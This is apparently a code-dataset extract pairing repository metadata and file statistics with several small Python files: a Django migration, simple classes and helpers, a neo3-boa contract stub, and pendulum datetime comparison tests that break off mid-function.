| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078534
| 191
| 4
| 52
| 47.75
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
c72d21a0f597edf318e575dca5ff141ef883b00b
| 166
|
py
|
Python
|
product/product_quantity.py
|
saiihamza/open_data_parsing
|
6757c6c6823a0523ca1d2af79e99b761b57a794d
|
[
"Apache-2.0"
] | null | null | null |
product/product_quantity.py
|
saiihamza/open_data_parsing
|
6757c6c6823a0523ca1d2af79e99b761b57a794d
|
[
"Apache-2.0"
] | null | null | null |
product/product_quantity.py
|
saiihamza/open_data_parsing
|
6757c6c6823a0523ca1d2af79e99b761b57a794d
|
[
"Apache-2.0"
] | null | null | null |
class ProductQuantity(object):
def __init__(self, str_quantity):
self.StrQuantity = str_quantity
def __str__(self):
return self.StrQuantity
| 20.75
| 39
| 0.692771
| 18
| 166
| 5.833333
| 0.555556
| 0.209524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.228916
| 166
| 7
| 40
| 23.714286
| 0.820313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
c737cce3e4f31e689313aeb49525ae650d73d35b
| 130
|
py
|
Python
|
declare_qtquick/widgets/api/qt/labs/folderlistmodel/__init__.py
|
likianta/declare-qtquick
|
93c2ce49d841ccdeb0272085c5f731139927f0d7
|
[
"MIT"
] | 3
|
2021-11-02T03:45:27.000Z
|
2022-03-27T05:33:36.000Z
|
declare_qtquick/widgets/api/qt/labs/folderlistmodel/__init__.py
|
likianta/declare-qtquick
|
93c2ce49d841ccdeb0272085c5f731139927f0d7
|
[
"MIT"
] | null | null | null |
declare_qtquick/widgets/api/qt/labs/folderlistmodel/__init__.py
|
likianta/declare-qtquick
|
93c2ce49d841ccdeb0272085c5f731139927f0d7
|
[
"MIT"
] | null | null | null |
from __declare_qtquick_internals__ import qml_imports
qml_imports.add("Qt.labs.folderlistmodel")
from .__list__ import * # noqa
| 26
| 53
| 0.823077
| 17
| 130
| 5.588235
| 0.764706
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 130
| 4
| 54
| 32.5
| 0.811966
| 0.030769
| 0
| 0
| 0
| 0
| 0.185484
| 0.185484
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c763a9dc6d8bcd0dbfdc07487d21e32a6862cad1
| 14,657
|
py
|
Python
|
indicators/migrations/0002_auto_20200215_0114.py
|
mikael19/activity
|
3932de42d9b423bff5739f7e06520035df213fc6
|
[
"Apache-2.0"
] | 60
|
2020-02-13T17:20:43.000Z
|
2022-03-12T19:26:04.000Z
|
indicators/migrations/0002_auto_20200215_0114.py
|
mikael19/activity
|
3932de42d9b423bff5739f7e06520035df213fc6
|
[
"Apache-2.0"
] | 449
|
2020-02-12T22:18:00.000Z
|
2022-03-11T23:36:59.000Z
|
indicators/migrations/0002_auto_20200215_0114.py
|
mikael19/activity
|
3932de42d9b423bff5739f7e06520035df213fc6
|
[
"Apache-2.0"
] | 31
|
2020-03-07T21:00:54.000Z
|
2021-07-14T18:37:34.000Z
|
# Generated by Django 2.2.10 on 2020-02-15 09:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('indicators', '0001_initial'),
('workflow', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='strategicobjective',
name='country',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Country'),
),
migrations.AddField(
model_name='strategicobjective',
name='organization',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Organization'),
),
migrations.AddField(
model_name='strategicobjective',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='indicators.StrategicObjective'),
),
migrations.AddField(
model_name='reportingperiod',
name='frequency',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ReportingFrequency'),
),
migrations.AddField(
model_name='periodictarget',
name='indicator',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='indicators.Indicator'),
),
migrations.AddField(
model_name='objective',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='indicators.Objective'),
),
migrations.AddField(
model_name='objective',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Program'),
),
migrations.AddField(
model_name='indicator',
name='approval_submitted_by',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='indicator_submitted_by', to='workflow.ActivityUser'),
),
migrations.AddField(
model_name='indicator',
name='approved_by',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='approving_indicator', to='workflow.ActivityUser'),
),
migrations.AddField(
model_name='indicator',
name='data_collection_frequency',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.DataCollectionFrequency', verbose_name='Data collection frequency'),
),
migrations.AddField(
model_name='indicator',
name='disaggregation',
field=models.ManyToManyField(blank=True, related_name='indicator_disaggregation_types', to='indicators.DisaggregationType'),
),
migrations.AddField(
model_name='indicator',
name='external_service_record',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ExternalServiceRecord', verbose_name='External Service ID'),
),
migrations.AddField(
model_name='indicator',
name='indicator_type',
field=models.ManyToManyField(blank=True, help_text=' ', to='indicators.IndicatorType'),
),
migrations.AddField(
model_name='indicator',
name='level',
field=models.ManyToManyField(blank=True, help_text=' ', to='indicators.Level'),
),
migrations.AddField(
model_name='indicator',
name='objectives',
field=models.ManyToManyField(blank=True, help_text=' ', related_name='obj_indicator', to='indicators.Objective', verbose_name='Objective'),
),
migrations.AddField(
model_name='indicator',
name='program',
field=models.ManyToManyField(help_text=' ', to='workflow.Program'),
),
migrations.AddField(
model_name='indicator',
name='reporting_frequency',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ReportingFrequency', verbose_name='Reporting frequency'),
),
migrations.AddField(
model_name='indicator',
name='sector',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Sector'),
),
migrations.AddField(
model_name='indicator',
name='strategic_objectives',
field=models.ManyToManyField(blank=True, help_text=' ', related_name='strat_indicator', to='indicators.StrategicObjective', verbose_name='Strategic objective'),
),
migrations.AddField(
model_name='historicalindicator',
name='approval_submitted_by',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ActivityUser'),
),
migrations.AddField(
model_name='historicalindicator',
name='approved_by',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ActivityUser'),
),
migrations.AddField(
model_name='historicalindicator',
name='data_collection_frequency',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.DataCollectionFrequency', verbose_name='Data collection frequency'),
),
migrations.AddField(
model_name='historicalindicator',
name='external_service_record',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.ExternalServiceRecord', verbose_name='External Service ID'),
),
migrations.AddField(
model_name='historicalindicator',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalindicator',
name='reporting_frequency',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.ReportingFrequency', verbose_name='Reporting frequency'),
),
migrations.AddField(
model_name='historicalindicator',
name='sector',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.Sector'),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='activity_table',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.ActivityTable'),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='agreement',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ProjectAgreement', verbose_name='Project Initiation'),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='approved_by',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ActivityUser', verbose_name='Originated By'),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='complete',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ProjectComplete'),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='evidence',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.Documentation', verbose_name='Evidence Document or Link'),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='indicator',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.Indicator'),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='periodic_target',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.PeriodicTarget'),
),
migrations.AddField(
model_name='historicalcollecteddata',
name='program',
field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.Program'),
),
migrations.AddField(
model_name='externalservicerecord',
name='external_service',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ExternalService'),
),
migrations.AddField(
model_name='disaggregationvalue',
name='disaggregation_label',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='indicators.DisaggregationLabel'),
),
migrations.AddField(
model_name='disaggregationtype',
name='country',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Country'),
),
migrations.AddField(
model_name='disaggregationlabel',
name='disaggregation_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='disaggregation_label', to='indicators.DisaggregationType'),
),
migrations.AddField(
model_name='collecteddata',
name='activity_table',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ActivityTable'),
),
migrations.AddField(
model_name='collecteddata',
name='agreement',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='q_agreement2', to='workflow.ProjectAgreement', verbose_name='Project Initiation'),
),
migrations.AddField(
model_name='collecteddata',
name='approved_by',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='approving_data', to='workflow.ActivityUser', verbose_name='Originated By'),
),
migrations.AddField(
model_name='collecteddata',
name='complete',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='q_complete2', to='workflow.ProjectComplete'),
),
migrations.AddField(
model_name='collecteddata',
name='disaggregation_value',
field=models.ManyToManyField(blank=True, help_text=' ', to='indicators.DisaggregationValue'),
),
migrations.AddField(
model_name='collecteddata',
name='evidence',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Documentation', verbose_name='Evidence Document or Link'),
),
migrations.AddField(
model_name='collecteddata',
name='indicator',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.Indicator'),
),
migrations.AddField(
model_name='collecteddata',
name='periodic_target',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.PeriodicTarget'),
),
migrations.AddField(
model_name='collecteddata',
name='program',
field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='i_program', to='workflow.Program'),
),
migrations.AddField(
model_name='collecteddata',
name='site',
field=models.ManyToManyField(blank=True, help_text=' ', to='workflow.SiteProfile'),
),
migrations.AddField(
model_name='activitytable',
name='country',
field=models.ManyToManyField(blank=True, to='workflow.Country'),
),
migrations.AddField(
model_name='activitytable',
name='owner',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.ActivityUser'),
),
]
| 53.298182
| 244
| 0.649246
| 1,495
| 14,657
| 6.182609
| 0.081605
| 0.099318
| 0.126907
| 0.148978
| 0.883371
| 0.87147
| 0.781781
| 0.686682
| 0.67186
| 0.617224
| 0
| 0.002282
| 0.222692
| 14,657
| 274
| 245
| 53.492701
| 0.809006
| 0.003138
| 0
| 0.715356
| 1
| 0
| 0.21035
| 0.087001
| 0.052434
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011236
| 0
| 0.026217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c799bd601ff7c758892430bc486153c9beeec9b6
| 125
|
py
|
Python
|
Introduction/Write a function.py
|
Code-With-Aagam/python-hackerrank
|
270c75cf2ca30916183c7fe5ca130a64c7a8ed6d
|
[
"MIT"
] | 3
|
2022-03-05T15:38:26.000Z
|
2022-03-09T13:39:30.000Z
|
Introduction/Write a function.py
|
Code-With-Aagam/python-hackerrank
|
270c75cf2ca30916183c7fe5ca130a64c7a8ed6d
|
[
"MIT"
] | null | null | null |
Introduction/Write a function.py
|
Code-With-Aagam/python-hackerrank
|
270c75cf2ca30916183c7fe5ca130a64c7a8ed6d
|
[
"MIT"
] | null | null | null |
import calendar # Don't reinvent the wheel
def is_leap(year):
# Write your logic here
return calendar.isleap(year)
| 31.25
| 43
| 0.72
| 19
| 125
| 4.684211
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208
| 125
| 4
| 44
| 31.25
| 0.89899
| 0.368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
c7adb1e495d2cb961e163ef20e979fdb660c4439
| 192
|
py
|
Python
|
cvrapi_client/exceptions.py
|
cliisberg/cvrapi-python-client
|
17582ca56cba322e2146e433db62a57b2d5bcb24
|
[
"MIT"
] | null | null | null |
cvrapi_client/exceptions.py
|
cliisberg/cvrapi-python-client
|
17582ca56cba322e2146e433db62a57b2d5bcb24
|
[
"MIT"
] | null | null | null |
cvrapi_client/exceptions.py
|
cliisberg/cvrapi-python-client
|
17582ca56cba322e2146e433db62a57b2d5bcb24
|
[
"MIT"
] | null | null | null |
class ApiError(Exception):
def __init__(self, error, status_code):
self.message = error
self.status_code = status_code
def __str__(self):
return self.message
| 21.333333
| 43
| 0.65625
| 23
| 192
| 5
| 0.521739
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.260417
| 192
| 8
| 44
| 24
| 0.809859
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
c7b00e93508068c64d3d5b09018cb0555cc8dd06
| 78
|
py
|
Python
|
mol/tests/test_util2.py
|
TzuTingWei/mol
|
9499925443f389d8e960b6d656f2953d21df3e3b
|
[
"MIT"
] | null | null | null |
mol/tests/test_util2.py
|
TzuTingWei/mol
|
9499925443f389d8e960b6d656f2953d21df3e3b
|
[
"MIT"
] | null | null | null |
mol/tests/test_util2.py
|
TzuTingWei/mol
|
9499925443f389d8e960b6d656f2953d21df3e3b
|
[
"MIT"
] | null | null | null |
import mol
def test_distance():
assert mol.util.distance([0,1], [0,2]) == 1
| 15.6
| 44
| 0.653846
| 14
| 78
| 3.571429
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074627
| 0.141026
| 78
| 4
| 45
| 19.5
| 0.671642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c7f0ef5810962551658faf34d1da1237450363e9
| 275
|
py
|
Python
|
boa3_test/test_sc/interop_test/blockchain/GetTransactionFromBlockUInt256.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/test_sc/interop_test/blockchain/GetTransactionFromBlockUInt256.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/test_sc/interop_test/blockchain/GetTransactionFromBlockUInt256.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
from boa3.builtin import public
from boa3.builtin.interop.blockchain import Transaction, get_transaction_from_block
from boa3.builtin.type import UInt256
@public
def main(hash_: UInt256, tx_index: int) -> Transaction:
return get_transaction_from_block(hash_, tx_index)
| 30.555556
| 83
| 0.821818
| 39
| 275
| 5.538462
| 0.487179
| 0.111111
| 0.208333
| 0.212963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036735
| 0.109091
| 275
| 8
| 84
| 34.375
| 0.844898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
40423128534b98189b764fa4b5faf54da78b8c46
| 10,756
|
py
|
Python
|
tests/datetime/test_comparison.py
|
aleksey-kutepov/pendulum
|
47ee3f51b0e27ec06a91a2f37d44e54dc31f888e
|
[
"MIT"
] | null | null | null |
tests/datetime/test_comparison.py
|
aleksey-kutepov/pendulum
|
47ee3f51b0e27ec06a91a2f37d44e54dc31f888e
|
[
"MIT"
] | null | null | null |
tests/datetime/test_comparison.py
|
aleksey-kutepov/pendulum
|
47ee3f51b0e27ec06a91a2f37d44e54dc31f888e
|
[
"MIT"
] | null | null | null |
import pytz
from datetime import datetime
import pendulum
from ..conftest import assert_datetime
def test_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 0, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, 12, 0, 0,
tzinfo= pendulum.timezone('America/Toronto'))
assert d2 == d1
assert d3 == d1
def test_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, tzinfo= pendulum.timezone('America/Toronto'))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_not_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_not_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, tzinfo= pendulum.timezone('America/Toronto'))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_none():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
assert d1 != None
def test_greater_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo= pendulum.UTC)
assert d1 > d2
assert d1 > d3
def test_greater_than_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo= pendulum.UTC)
assert not d1 > d2
assert not d1 > d3
def test_greater_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 > d2
assert d1 > d3
def test_greater_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 > d2
assert not d1 > d3
def test_greater_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo= pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo= pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo= pendulum.UTC)
assert not d1 >= d2
assert not d1 >= d3
def test_greater_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 >= d2
assert not d1 >= d3
def test_less_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 < d2
assert d1 < d3
def test_less_than_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 < d2
assert not d1 < d3
def test_less_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 < d2
assert d1 < d3
def test_less_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 < d2
assert not d1 < d3
def test_less_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 <= d2
assert not d1 <= d3
def test_less_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 <= d2
assert not d1 <= d3
def test_is_birthday():
with pendulum.test(pendulum.now()):
d = pendulum.now()
a_birthday = d.subtract(years=1)
assert a_birthday.is_birthday()
not_a_birthday = d.subtract(days=1)
assert not not_a_birthday.is_birthday()
also_not_a_birthday = d.add(days=2)
assert not also_not_a_birthday.is_birthday()
d1 = pendulum.datetime(1987, 4, 23)
d2 = pendulum.datetime(2014, 9, 26)
d3 = pendulum.datetime(2014, 4, 23)
assert not d2.is_birthday(d1)
assert d3.is_birthday(d1)
def test_closest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
